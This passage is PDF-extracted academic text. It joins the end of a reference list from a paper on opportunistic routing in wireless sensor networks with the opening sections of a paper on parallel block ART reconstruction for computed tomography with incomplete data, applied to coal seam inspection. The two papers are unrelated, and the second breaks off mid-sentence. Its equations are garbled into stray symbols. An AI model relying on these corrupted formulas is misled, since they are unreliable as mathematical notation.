ACM. Chakchouk N. 2015. A survey on opportunistic routing in wireless communica- tion networks. IEEE Communications Surveys & Tutorials 17(4):2214–2241 DOI 10.1109/COMST.2015.2411335. Chithaluru P, Tiwari R, Kumar K. 2019. AREOR–adaptive ranking based energy efficient opportunistic routing scheme in Wireless Sensor Network. Computer Networks 162:106863–106875 DOI 10.1016/j.comnet.2019.106863. Choudhury RR, Vaidya NH. 2004. MAC-layer anycasting in ad hoc networks. ACM SIGCOMM Computer Communication Review 34(1):75–80. Coutinho RW, Boukerche A. 2017. Opportunistic routing in underwater sensor networks: potentials, challenges and guidelines. In: Paper presented at the 2017 13th international conference on distributed computing in sensor systems (DCOSS). Darehshoorzadeh A, Robson E, Boukerche A. 2015. Toward a comprehensive model for performance analysis of opportunistic routing in wireless mesh networks. IEEE Transactions on Vehicular Technology 65(7):5424–5438. Eu ZA, Tan H-P, Seah WK. 2010. Opportunistic routing in wireless sensor networks powered by ambient energy harvesting. Computer Networks 54(17):2943–2966 DOI 10.1016/j.comnet.2010.05.012. Hasnain M, Malik MH, Aydin ME. 2018. An adaptive opportunistic routing scheme for reliable data delivery in WSNs. In: Proceedings of the 2nd international conference on future networks and distributed systems. Hawbani A, Wang X, Sharabi Y, Ghannami A, Kuhlani H, Karmoshi S. 2019. LORA: load-balanced opportunistic routing for asynchronous duty-cycled WSN. IEEE Transactions on Mobile Computing 18(7):1601–1615 DOI 10.1109/TMC.2018.2865485. Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 23/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326#supplemental-information http://dx.doi.org/10.7717/peerj-cs.326#supplemental-information http://dx.doi.org/10.1145/1090191.1080108 http://dx.doi.org/10.1109/COMST.2015.2411335 http://dx.doi.org/10.1016/j.comnet.2019.106863 http://dx.doi.org/10.1016/j.comnet.2010.05.012 http://dx.doi.org/10.1109/TMC.2018.2865485 http://dx.doi.org/10.7717/peerj-cs.326 Jadhav P, Satao R. 2016. A survey on opportunistic routing protocols for wireless sensor networks. Procedia Computer Science 79:603–609 DOI 10.1016/j.procs.2016.03.076. Jain N, Dongariya A, Verma A. 2017. Comparative study of different types of relay selection scheme for cooperative wireless communication. In: 2017 international conference on information, communication, instrumentation and control (ICICIC). Kafaie S, Chen Y, Dobre OA, Ahmed MH. 2018. Joint inter-flow network coding and opportunistic routing in multi-hop wireless mesh networks: a compre- hensive survey. IEEE Communications Surveys & Tutorials 20(2):1014–1035 DOI 10.1109/COMST.2018.2796101. Kannan G, Raja TSR. 2015. Energy efficient distributed cluster head scheduling scheme for two tiered wireless sensor network. Egyptian Informatics Journal 16(2):167–174 DOI 10.1016/j.eij.2015.03.001. Khan A, Ali I, Rahman AU, Imran M, Mahmood H. 2018. Co-EEORS: cooperative energy efficient optimal relay selection protocol for underwater wireless sensor networks. IEEE Access 6:28777–28789 DOI 10.1109/ACCESS.2018.2837108. Larsson P. 2001. Selection diversity forwarding in a multihop packet radio network with fading channel and capture. ACM SIGMOBILE Mobile Computing and Communica- tions Review 5(4):47–54 DOI 10.1145/509506.509517. Lee GY, Haas ZJ. 2011. Simple, practical, and effective opportunistic routing for short- haul multi-hop wireless networks. IEEE Transactions on Wireless Communications 10(11):3583–3588 DOI 10.1109/TWC.2011.092711.101713. Li B, Li H, Zhang R, Wei C. 2019. An energy-efficient metric for relay selection in large- scale multi-hop wireless networks. In: Paper presented at the 2019 international conference on computing, networking and communications (ICNC). Liang JZ. 2020. A reliable trust computing mechanism based on multi-source feed- back and fog computing in social sensor cloud. EEE Internet of Things Journal 7:5481–5490. Liang W, Luo J, Xu X. 2013. Network lifetime maximization for time-sensitive data gathering in wireless sensor networks with a mobile sink. Wireless Communications and Mobile Computing 13(14):1263–1280 DOI 10.1002/wcm.1179. Luo J, Hu J, Wu D, Li R. 2015. Opportunistic routing algorithm for relay node se- lection in wireless sensor networks. IEEE Transactions on Industrial Informatics 11(1):112–121 DOI 10.1109/TII.2014.2374071. Mao X, Tang S, Xu X, Li X, Ma H. 2011. Energy-efficient opportunistic routing in wire- less sensor. IEEE Transactions on Parallel and Distributed Systems 22(11):1934–1942 DOI 10.1109/TPDS.2011.70. Menon VG. 2019. Review on opportunistic routing protocols for dynamic Ad hoc networks: taxonomy, applications and future research directions. Preprints 2019. 2019030118 DOI 10.20944/preprints201903.0118.v1. Nadar C, Patil R, Raut S, Mhatre K. 2017. Energy efficient optimal opportunistic routing using sleep mode for wireless sensor network. In: 2017 international conference on innovations in information, embedded and communication systems (ICIIECS). Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 24/25 https://peerj.com http://dx.doi.org/10.1016/j.procs.2016.03.076 http://dx.doi.org/10.1109/COMST.2018.2796101 http://dx.doi.org/10.1016/j.eij.2015.03.001 http://dx.doi.org/10.1109/ACCESS.2018.2837108 http://dx.doi.org/10.1145/509506.509517 http://dx.doi.org/10.1109/TWC.2011.092711.101713 http://dx.doi.org/10.1002/wcm.1179 http://dx.doi.org/10.1109/TII.2014.2374071 http://dx.doi.org/10.1109/TPDS.2011.70 http://dx.doi.org/10.20944/preprints201903.0118.v1 http://dx.doi.org/10.7717/peerj-cs.326 Raman A, Sharma S. 2017. Optimization of Communication parameters in wireless sensor network. In: Communication and computing systems: proceedings of the international conference on communication and computing systems (ICCCS 2016), Gurgaon, India, 9–11 September, 2016. Ren J, Zhang Y, Zhang K, Liu A, Chen J, Shen XS. 2016. Lifetime and energy hole evolution analysis in data-gathering wireless sensor networks. IEEE Transactions on Industrial Informatics 12(2):788–800 DOI 10.1109/TII.2015.2411231. Ritter FE, Schoelles MJ, Quigley KS, Klein LC. 2011. Human-in-the-loop simulations. Cham: Springer, 97–116. Thakkar A. 2014a. Alive nodes based improved low energy adaptive clustering hierarchy for wireless sensor network. In: Advanced computing, networking and informatics. New York City: Springer, Cham. Thakkar A. 2014b. Cluster head election for energy and delay constraint applications of wireless sensor network. IEEE Sensors Journal 14:2658–2664. Thakkar A. 2015. A new Bollinger Band based energy efficient routing for clustered wireless sensor network. Applied Soft Computing 32:144–153. Thakkar A. 2016. KIP: a novel self-guided adaptive clustering approach to prolong lifetime of wireless sensor networks. In: Communication and computing systems: proceedings of the international conference on communication and computing systems (ICCCS 2016). Thakkar A. 2017. DEAL: distance and energy based advanced LEACH protocol. In: International conference on information and communication technology for intelligent systems. New York City: Springer. Wang TZ. 2020. Data collection from WSNs to the cloud based on mobile Fog elements. Amsterdam, Netherlands: Elsevier. Zhai Z, Qian J, Tao Y, Zhao L, Cheng B. 2018. Poster: a lightweight timestamp-based mac detection scheme for xor network coding in wireless sensor networks. In: Paper presented at the proceedings of the 24th annual international conference on mobile computing and networking. Zhang X, Tao L, Yan F, Sung DK. 2019. Shortest-latency opportunistic routing in asynchronous wireless sensor networks with independent duty-cycling. IEEE Transactions on Mobile Computing 19:711–723. Zhao Z, Mosler B, Braun T. 2012. Performance evaluation of opportunistic routing protocols: a framework-based approach using OMNeT++. In: Proceedings of the 7th Latin American Networking Conference. 28–35. Zorzi M, Rao RR. 2003. Geographic random forwarding (GeRaF) for ad hoc and sensor networks: energy and latency performance. IEEE Transactions on Mobile Computing 2(4):349–365 DOI 10.1109/TMC.2003.1255650. Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 25/25 https://peerj.com http://dx.doi.org/10.1109/TII.2015.2411231 http://dx.doi.org/10.1109/TMC.2003.1255650 http://dx.doi.org/10.7717/peerj-cs.326 work_m2m35ilx25blzb7pdwwciv4riu ---- Implementation of the computer tomography parallel algorithms with the incomplete set of data Implementation of the computer tomography parallel algorithms with the incomplete set of data Mariusz Pleszczyński Faculty of Applied Mathematics, Silesian Technical University of Gliwice, Gliwice, Śląskie, Poland ABSTRACT Computer tomography has a wide field of applicability; however, most of its applications assume that the data, obtained from the scans of the examined object, satisfy the expectations regarding their amount and quality. Unfortunately, sometimes such expected data cannot be achieved. Then we deal with the incomplete set of data. In the paper we consider an unusual case of such situation, which may occur when the access to the examined object is difficult. The previous research, conducted by the author, showed that the CT algorithms can be used successfully in this case as well, but the time of reconstruction is problematic. One of possibilities to reduce the time of reconstruction consists in executing the parallel calculations. In the analyzed approach the system of linear equations is divided into blocks, such that each block is operated by a different thread. Such investigations were performed only theoretically till now. In the current paper the usefulness of the parallel-block approach, proposed by the author, is examined. The conducted research has shown that also for an incomplete data set in the analyzed algorithm it is possible to select optimal values of the reconstruction parameters. We can also obtain (for a given number of pixels) a reconstruction with a given maximum error. The paper indicates the differences between the classical and the examined problem of CT. The obtained results confirm that the real implementation of the parallel algorithm is also convergent, which means it is useful. Subjects Artificial Intelligence, Computer Aided Design, Computer Vision, Optimization Theory and Computation, Scientific Computing and Simulation Keywords Computer tomography, Parallel algorithms, Incomplete set of data, Big Data, Signal and data processing INTRODUCTION Computer tomography has a very wide field of applicability. Except the classical application in medicine (Donegani et al., 2020), for which the concepts and the first tomograph have been developed (Hounsfield, 1972), the methods of computer tomography are used in many other areas as well. In general, the computer tomography founds an application whenever there appears a need of examining the object inside, without affecting its structure (Cozzolino et al., 2020; Gong, Nie & Xu, 2020; Yao, Liu & Xu, 2020; Kamath et al., 2016). The whole process of tomograph examination can be divided into two main stages: collection of data and transformation of these data into image. The research executed for How to cite this article Pleszczyński M. 2021. Implementation of the computer tomography parallel algorithms with the incomplete set of data. PeerJ Comput. Sci. 7:e339 DOI 10.7717/peerj-cs.339 Submitted 22 October 2020 Accepted 28 November 2020 Published 24 February 2021 Corresponding author Mariusz Pleszczyński, mariusz.pleszczynski@polsl.pl Academic editor Robertas Damaševičius Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.339 Copyright 2021 Pleszczyński Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.339 mailto:mariusz.�pleszczynski@�polsl.�pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.339 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ the first stage consists in selecting the radiation beam, the radiation type, or in minimization of the necessary radiation dose, which is especially important for medical tomography (Malczewski, 2020). The second stage assumes that the data are already collected and ready to be transformed into the image of interior of the investigated object. This part is executed with the aid of the selected reconstruction algorithms. Such algorithms can be divided into two groups: analytical algorithms (Averbuch & Shkolnisky, 2003; Lewitt, 1983; Waldén, 2000) and algebraic algorithms (Andersen, 1989; Gordon, Bender & Herman, 1970; Guan & Gordon, 1996). The former group of algorithms is very good in the classical applications of computer tomography, when the collected data satisfy the assumption of Kotelnikov Theorem (Natterer, 1986), which states, in general, that the initial data must be sufficiently numerous and of sufficiently good quality. However sometimes this assumption is impossible to fulfill, because, for example, of the size of examined object or its inaccessibility. We have then the situation of incomplete data set. As the studies have shown, the application of analytical algorithms is ineffective in the case of incomplete data set, whereas the algebraic algorithms can be successfully used (Hetmaniok, Ludew & Pleszczyński, 2017). The approach in case of the incomplete set of data is important with respect of possible applications, for example, in examination of the mine coal seam (see “Problem with the Incomplete Set of Data”). The seam of coal may include the accumulations of unwanted rocks (which is important for economic reasons) or the areas of compressed gas (which is even more important because of the safety reasons). The compressed gas may explode during the coal seam exploitation causing the rock and gas ejections and the bumps, extremely dangerous for life and health of working people. For example, in Polish coal mines, in the second half of the 20th century 31 miners died because of that reason. The biggest catastrophe of this kind happened on the 7th September 1976 in the coal mine in Nowa Ruda, where 19 miners have been killed. Obviously there exist some methods of examining the mine coal seam before its exploitation, but these methods are invasive, time- and energy-consuming, which means that they are not very safe and significantly increase the mining costs. The research, conducted so far, shows that the selected algorithms, belonging to the group of algebraic algorithms, can be applied for solving the problem with the incomplete set of data (for example in examination of the mine coal seam), however the specifics of such received data causes that the reconstruction process takes significantly more time than in classical approach. Therefore, the algorithms using the parallel computations are proposed, the aim of which is to reduce the time needed to examine the internal structure of the studied object. Till now such algorithms have been developed and studied only theoretically (Hetmaniok, Ludew & Pleszczyński, 2017), and simulated only for the one-thread process. Goal of the current paper is to investigate the convergence of such algorithms in case when the parallel computations are executed with the real application of several cores/threads. This study will be the ground for the further research on effectiveness of these algorithms in comparison with the sequential algorithms. Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 2/19 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ Ideas of the computer tomography Assuming that the distribution of density in the interior of examined object is described by means of function f(x,y) (which can be the continuous function as well as the discrete function), the computer tomography is meant to reconstruct this function on the basis of scans of this object along some paths L. Each scan (projection) informs how many energy is lost by the given ray along the given path. Since every sort of materia is characterized by the individual absorption of energy (e.g., for X-rays, where it refers to water which is assigned material density 998.2 (kg/m3), attenuation coefficient 0 Hounsfield units (HU), muscle tissue has 1,060 (kg/m3) and 41 HU, blood: 1,060 (kg/m3) and 53 HU, bone males: 3,880 (kg/m3) and 1,086 HU), therefore the function f(x,y) can be retrieved on the ground of such data, described by equation p ¼ pL � ln I0I ¼ R L f ðx; yÞdL, where L denotes the mention path, pL means the projection obtained in this path, I0 is the initial intensity of radiation, whereas I is the final intensity. At the beginning of the last century it has been proven (Radon, 1917) that the reconstruction of function f(x,y) is possible based on the infinitely many projections. Assumption of possessing infinitely many projections is impossible to fulfill in real life. In practice it is possible to get only finite number of projections, therefore very important for development of computer tomography are the works (Louis, 1984a, 1984b) presenting the conditions connecting the number of projections (this number consists of the number of scanning angles and the number of rays in one beam) with the possibility of reconstructing the function f(x,y). The analytical algorithms, mentioned above, are based, among others, on the Fourier and Radon transforms, and also on the concept of filtered backprojection, therefore they cannot be used for the projections of insufficiently good quality. For this reason we will consider only the algebraic algorithms. Algebraic algorithms In the algebraic algorithms it is assumed that the examined object is located in the rectangle (or square, very often), which can be divided into N = n2 smaller congruent squares (pixels). Size of these pixels enables to assume that the reconstructed function f(x,y) takes on unknown constant value in each pixel. Thanks to this, by knowing the initial energy of radiation and the energy of the given ray after passing through the investigated object (in this way we know the value of lost energy, that is the value of projection), the equation of path passed by the ray, the density of discretization (number of pixels) and keeping in mind the fact that every sort of materia is characterized by the individual capacity of energy absorption, we can calculate the total energy loss for the given ray (the value of projection) as the sum of energy losses in every pixel met by the ray. The loss of energy in one pixel is proportional to the road passed by the ray in this pixel (this value is known) and to the unknown value of function f(x,y) in this pixel (values of this function should be found). Considering every ray individually we obtain a system of linear equations (single scanning is represented by one line of this system): AX ¼ B; (1) Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 3/19 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ where A denotes a matrix of dimension m × N containing the non-negative real elements, m means the number of projections and N = n2 means the number of pixels, X denotes a matrix (vector) of length N containing the unknown elements—each ith element of this matrix represents the unknown constant value of the reconstructed function f(x,y) for ith pixel, finally B is a matrix (vector of length m) of projections. The algebraic algorithms differ from each other in the method of solving the system (1). Since matrix A has some specific characteristics: � it is a sparse and nonsymmetric matrix (the vast majority of elements is equal to zero1), � it is not a square matrix (mostly there is definitely more rows than columns), � it is nonsingular matrix, � its dimension is very big, therefore for solving the system (1) we cannot apply the classical methods dedicated to the solution of the systems of linear equations. Kaczmarz algorithm Most of the algebraic algorithms is based on the Kaczmarz algorithm, the convergence of which has been proven at first for the square systems (Kaczmarz, 1937) and next also for the rectangle systems (Tanabe, 1971). This algorithm starts by selecting any initial solution xð0Þ 2 RN, and every successive approximation of solution x(k), k 2 N, is computed as the orthogonal projection of the previous solution onto hyperplane Hi, i = (k − 1,m) + 1, where hyperplane Hi is represented by the respective line of system (1), that is Hi ¼ fx 2 RN : ai � X ¼ pig, where operation ∘ is defined as the classic scalar product of vectors from space RN, ai denotes the ith row of matrix A, pi means the ith projection, that is pi = bi is the ith element of vector B, i = (k − 1, m) + 1. Geometric interpretation of this algorithm is presented in Fig. 1. Algorithm ART For many years the Kaczmarz algorithm was not applied. Thanks to papers (Gordon, Bender & Herman, 1970; Tanabe, 1971) it was modified to algorithm ART and in this form it has found an application in computer tomography. Algorithm ART, similarly like the Kaczmarz algorithm, starts by choosing any initial solution xð0Þ 2 RN and the next approximations of solution are created by means of the following relation xðkþ1Þ ¼ xðkÞ þ �k pi � ai � xðkÞ kaik2 ai (2) where the same notations hold, as before, additionally ||·|| means the norm of vector (that is the length of vector) and � 2 R denotes the relaxation coefficient. Similarly like in case of other algorithms discussed in this paper, we can speed up the convergence of ART algorithm by using the physical property of the studied 1 It is easy to notice that a single row of length n2 has at most 2n − 1 nonzero elements Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 4/19 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ phenomenon—each sort of matter is characterized by the specific capacity of absorbing the energy of penetrating radiation. Value describing this capacity is nonnegative, therefore after determining the solution x(k + 1) we operate with the aid of operator C, called in literature the constraining operator, taking in this paper the following form C : RN ! RN; Cðx1; x2; . . . ; xNÞ ¼ ðy1; y2; . . . ; yNÞ; (3) where yi ¼ xi; xi � 0;0; xi < 0; � 1 � i � N (4) Several years after introducing the ART algorithm, it has been proven in paper (Trummer, 1984) that this algorithm is convergent if 0 < λk = λ < 2, whereas in case when λ does not have to be constant, the ART algorithm is convergent if 0 < liminf λk ≤ limsup λk < 2. In specific case when λk = λ = 1 the ART algorithm is the Kaczmarz algorithm. Obviously there exist many other algebraic algorithms, like for example the algorithms ART-3 (Herman, 1975), MART (Gordon, Bender & Herman, 1970; Verhoeven, 1993), SIRT (Gilbert, 1972), SART (Andersen & Kak, 1984) and others. We focus in the current paper on the ART algorithm (and its parallel adaptations) because, as the research shows, the other algorithms are characterized by the same convergence rate and the algorithm ART is simple in implementation which is its great advantage. x x x x x x x x H H H Figure 1 Geometric interpretation of the Kaczmarz algorithm. Full-size DOI: 10.7717/peerj-cs.339/fig-1 Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 5/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-1 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ The algebraic algorithms, adapted to the problem with incomplete set of data, appeared to be convergent, stable and detecting the non-transparent element, which means that they are very useful (Hetmaniok, Ludew & Pleszczyński, 2017). However the main disadvantage of these algorithms is their convergence speed—less than 20 iterations is required for solving the problem with complete set of data2, whereas few hundred, or even more than one thousand, iterations is often needed for solving the problem with incomplete set of data. The stopping condition for the ART algorithm (as well as for the other algorithms discussed in this article) can be defined as the assumed number of executed iterations or the assumed precision of the obtained approximate solution. System of algebraic linear equations similar to considered one are overdetermined ad as a rule are inconsistent. The Kaczmarz method and its modifications converge to some “pseudosolution”. The research concerning this subject were also performed—one can notice that the successive approximate solutions, after reaching some level of precision, “circulate” around the theoretical exact solution, however they are contained within some N-dimensional sphere with central point located in this exact solution and radius proportional to the level of error burdening the input data. One of possibilities to defeat the described disadvantage consists in applying the parallel calculations in the process of determining the solution of system (1). Among many algorithms using this approach we select the parallel block algorithms. Parallel block algorithms Parallel block algorithms are created to use the parallel work of many processors/threads, however the number of threads is relatively small (differently like in case of using the threads of graphics cards with CUDA technology). The general concept of these algorithms consists in partition of the system of Eq. (1) into blocks (the number of blocks corresponds to the number of used threads) so that the set of indices of rows of matrix A is presented in the form of sum: {1,2,…,m} = B1∪ B2∪…∪ BM, where, in the standard approach, we have Bi ∩ Bj = Ø for i ≠ j, and the cardinalities of sets Bi, 1 ≤ i ≤ M, are equal more or less (very often the blocks are formed so that the first block includes about mM first rows, the second block includes mM next rows, and so on). The blocks work parallel in such a way that they have the same initial vector (starting solution) x(k), k ≥ 0, in every block the algorithm (for example the ART algorithm) is performed on the rows of matrix A belonging to this block, next, after executing one iteration (by using all available rows), the approximate solution y(k,i), k ≥ 0, 1 ≤ i ≤ M, from each block is returned. After that the solutions are averaged and such average solution x(k + 1) can serve as the initial solution for all blocks in the next iteration. Graphical illustration of the parallel block algorithm is presented in Fig. 2. The Fig. 3 shows the BP algorithm in more detail (block algorithm). Assuming the partition of matrix A into blocks (vector B of projections is partitioned in the same way), the parallel block algorithm PB (introduced by the Author) can be presented in the following way: we select the initial solution x(0), we calculate the solution x(k + 1), k ≥ 0, according to formula 2 One iteration means the consideration of all lines in system (1), that is the execu- tion of m (1) projections. Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 6/19 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ xðkþ1Þ ¼ XM i¼1 Wiy ðkþ1;iÞ (5) where yðkþ1;iÞ ¼ QixðkÞ (6) whereas Qi denotes the operator composing the operators P, that is Qi ¼ Pi;b1Pi;b2 . . . Pi;bs (7) where operator Pi,bj means the execution of projection (2), defined in the ART algorithm, onto the jth hyperplane of block Bi possessing s elements. Component Wi, occurring in formula (5), is responsible for averaging the solutions obtained from the respective blocks and is defined by the square matrix of dimension N having the following form Wi ¼ diagfwi1; wi2; . . . ; wiNg where wij ¼ X q2Bi aq;j XM q¼1 aq;j and aq,j denotes the element of matrix A located in qth row and jth column, 1 ≤ i ≤ M, 1 ≤ j ≤ N. Problem with the incomplete set of data Problem of the incomplete set of data in the classical form is discussed, for example, in Andersen (1989). The incomplete set of data is presented there, and also in many other x k B B BM M yk yk yk M x k+1 Figure 2 Scheme of the parallel block algorithm. Full-size DOI: 10.7717/peerj-cs.339/fig-2 Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 7/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-2 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ publications, in the following way: for the parallel beam there is executed 100 directions of scanning (for angles of range between 0 and 180 degrees) and in each beam there are 121 rays (then the set of data is complete). The scans at angles between 56 and 80 degrees are missing in this set (which generates the incomplete set of data—about 14% of data is missing in this set, about 86% of data is given there). However in the considered case we are very far from this situation—the scans are performed only between two opposite walls, which means that the scanning angles are included within the right angle, so one can say that we have 50% of data in our disposal (this estimation is still too optimistic). The Author analyzed such situation and came to the conclusion that the interior of the Figure 3 Scheme of the parallel block algorithm. Full-size DOI: 10.7717/peerj-cs.339/fig-3 Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 8/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-3 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ examined object can be reconstructed also in such conditions (convergence, stability, influence of noises, occurrence of non-transparent elements were investigated), but this reconstruction takes quite a long time. Therefore the solutions, different than the ones used in various classical approaches, were sought and are still required (the Author tested them in his cited paper), like: selection (on the way of appropriate investigations) of optimal values of parameters, other sorts of algorithms, sorting the rows in matrix of the system of equations, introduction of chaotic and asynchronous algorithms, introduction of parallel algorithms (parallel-block and block-parallel). Separate application of these approaches (or of their combinations) caused, the most often, the improvement of the convergence speed, however this improvement was not big enough to accept it as sufficient. Similar studies were also carried out in other studies (e.g., Jiang & Wang (2003), most often assuming a complete set of data—therefore this case requires separate studies). For example, Sørensen & Hansen (2014) shows that the row sorting effect of A does not significantly improve time. Many authors have studied block and parallel algorithms (also block parallel algorithms), including graphs, many other approaches were also used (a large part of them was also investigated by the author for this issue) (Censor et al., 2008; Drummond et al., 2015; Elfving & Nikazad, 2009; Gordon & Gordon, 2005; Sørensen & Hansen, 2014; Torun, Manguoglu & Aykanat, 2018; Zhang & Sameh, 2018). As we mentioned before, the computer tomography, considered in its classical sense, requires the projection of a very good quality (many scanning angles, many rays in one beam). However in study of some problems, like for example in examination of the mine coal seam, the size of investigated object or difficult access to it does not allow to get such type of projection. Then we have the problem with the incomplete set of data. The most often we can use the data obtained only between two opposite walls of the studied object (such system will be called the (1 × 1) system), and sometimes between pairs of two opposite walls (such system will be called the (1 × 1, 1 × 1) system). System (1 × 1) is presented in Fig. 4 and an example of its application (coal seam testing) is shown in the Fig. 5. Mathematical models of phantoms In the seam of coal, in which we search for dangerous areas of compressed gas or unwanted interlayers of barren rocks, the distribution of density is discrete and the densities of included elements differ from each other. Therefore the models used for testing the convergence of discussed algorithms possess the discrete distribution of high contrast. Thus, the two-dimensional function describing the distribution of density takes the following form f ðx; yÞ ¼ c1; ðx; yÞ 2 D1 � E; c1; ðx; yÞ 2 D2 � E; cs; ðx; yÞ 2 Ds � E; 8>>< >>: (8) where ci 2 R, 1 ≤ i ≤ s, E = {(x,y) − 1 ≤ x, y ≤ 1}, and the regions Di, 1 ≤ i ≤ s, are disjoint (more precisely, the area if their common part is equal to zero). Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 9/19 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ An additional parameter, affecting the convergence of investigated algorithm PB, is the number of sources and detectors. This parameter is denoted by pkt and influences directly the dimension of matrix A of system (1)—it determines the number of rows in this matrix. We assume in this article that the number of sources and detectors are equal and we reject (for uniqueness—we eliminate the case when the ray runs along the mesh discretizing the square E) the first and the last projection. Then we have m = pkt2 − 2. Results of experiments To show that the PB algorithm is convergent in practise (not only in theory) one has to prove that it is possible to select the optimal3 values of parameters m and λ for the given resolution (number of pixels n2 = N), similarly like in case of the sequential algorithms. Obviously, for such selected values of reconstruction parameters it should be possible to retrieve the sought function with the given precision. Table 1 presents the times needed to achieve the error Δ < 0.05 in reconstruction of function f1(x,y) for n = 40 with the use of 3 threads, depending on the values of parameters m and λ, whilst D ¼ max 1�i�N f1ðpikiÞ � ~f 1ðpikiÞ �� (9) Figure 4 System (1 × 1) where 1—sources of rays, 2—object under research, 3—rays, 4—detectors. Full-size DOI: 10.7717/peerj-cs.339/fig-4 3 As the research shows, the exact optimal values are impossible to determine, because they depend on various ele- ments, like the expected value of para- meter l, form of function f (x, y), the system of data collection and so on. Whereas it is possible to observe some approximate relation between these values. Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 10/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-4 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ 21 3 4 5 6 E Figure 5 The scheme of a coal bed working: 1—sources; 2—detectors; 3—unmined coal; 4—heading; 5—longwall with mechanized lining, belt conveyor flight, heading machine so on; 6—caving or filling; E—researching coal bed. Full-size DOI: 10.7717/peerj-cs.339/fig-5 Table 1 Dependence of the reconstruction time [s] for the given n on the values of parameters m and λ (value > 10 means the time longer than 10 s). λ ↓ m → 32 34 38 40 42 44 48 50 52 54 0.25 >10 >10 >10 >10 >10 >10 3.963 4.321 4.336 3.9 0.5 >10 >10 >10 2.683 2.403 2.465 1.856 1.997 1.997 1.794 0.75 2.356 >10 3.229 1.7 1.45 1.544 1.154 1.248 1.202 1.107 1 1.732 2.87 2.434 1.17 0.967 1.092 0.796 0.889 0.827 0.78 1.25 1.326 2.137 1.95 0.904 0.78 0.827 0.608 0.64 0.608 0.609 1.5 1.232 1.825 1.701 0.78 0.687 0.702 0.577 0.484 0.593 0.624 1.75 1.155 1.638 1.56 0.733 0.608 0.609 0.639 0.562 0.717 0.764 2 1.223 1.7 1.716 0.702 0.608 0.842 0.874 0.749 1.107 1.061 2.5 1.903 3.307 >10 >10 >10 >10 >10 >10 >10 >10 λ B m → 58 60 62 64 68 70 72 74 78 80 0.25 3.963 4.18 4.243 4.15 3.744 3.978 3.885 3.572 3.697 3.978 0.5 1.919 1.935 1.919 1.935 1.747 1.81 1.872 1.747 1.794 1.81 0.75 1.232 1.186 1.17 1.17 1.154 1.342 1.154 1.201 1.233 1.264 1 0.92 0.795 0.796 0.827 0.921 1.061 0.952 0.967 0.983 1.076 1.25 0.78 0.671 0.671 0.67 0.811 1.014 0.858 0.92 0.936 1.076 1.5 0.811 0.64 0.655 0.655 0.858 1.077 0.921 0.951 0.936 1.154 1.75 1.045 0.749 0.905 0.858 1.061 1.342 1.108 1.154 1.201 1.357 2 1.716 1.201 1.451 1.482 1.404 1.716 1.514 1.575 1.778 1.794 Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 11/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-5 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ where piki is the ith pixel, f1 denotes the exact values of sought function, whereas ~f1 describes its reconstructed values. Error (9) takes this form only in the initial stages of algorithm usability testing. We then refer to an exact solution, which we do not know of course in real cases. However, such an approach has an undoubted advantage—by conducting a series of experiments, we can estimate the number of iterations (for given values of the reconstruction parameters) to obtain a given quality of reconstruction. The obtained results are like expected. The shortest time is for m = 50 and λ = 1.5 (more detailed investigation around this value of λ, with step 0.1, showed that this is the best result in this case). Calculations executed for other resolutions and other functions describing the distribution of density gave similar results concerning the proportion of n to m and to the value of λ. The literature (see e.g., Gordon & Gordon, 2005) shows that in the case of a complete set of data, the selection of the optimal λ parameter depends heavily on the number of threads. The Fig. 6 shows the reconstruction time (quotient of the time tλ for obtaining the error (9) Δ < 0.01 for a given value of λ and for a given number of threads and the time tmax maximum for this number of threads) from the number of threads th. In the case of a incomplete set of data, the situation is different. For any number of threads, the optimal value for λ is similar. The results for the number of threads 4, 6 and 8 are also interesting: the algorithm converges there for 0.1 ≤ λ ≤ 10 (the Fig. 6 it is shown for λ ≤ 4). Table 2 presents optimal values of the λ parameter for the step s = 0.1 and for the step s = 0.01. The research was carried out for many different functions of the density distribution and for many values of the reconstruction parameters selected for these functions. We now present graphically the obtained results for two selected examples. The first presented t t Figure 6 Dependence of the reconstruction on λ parameter value for an equal number of threads. Full-size DOI: 10.7717/peerj-cs.339/fig-6 Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 12/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-6 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ function of the density distribution will be the function 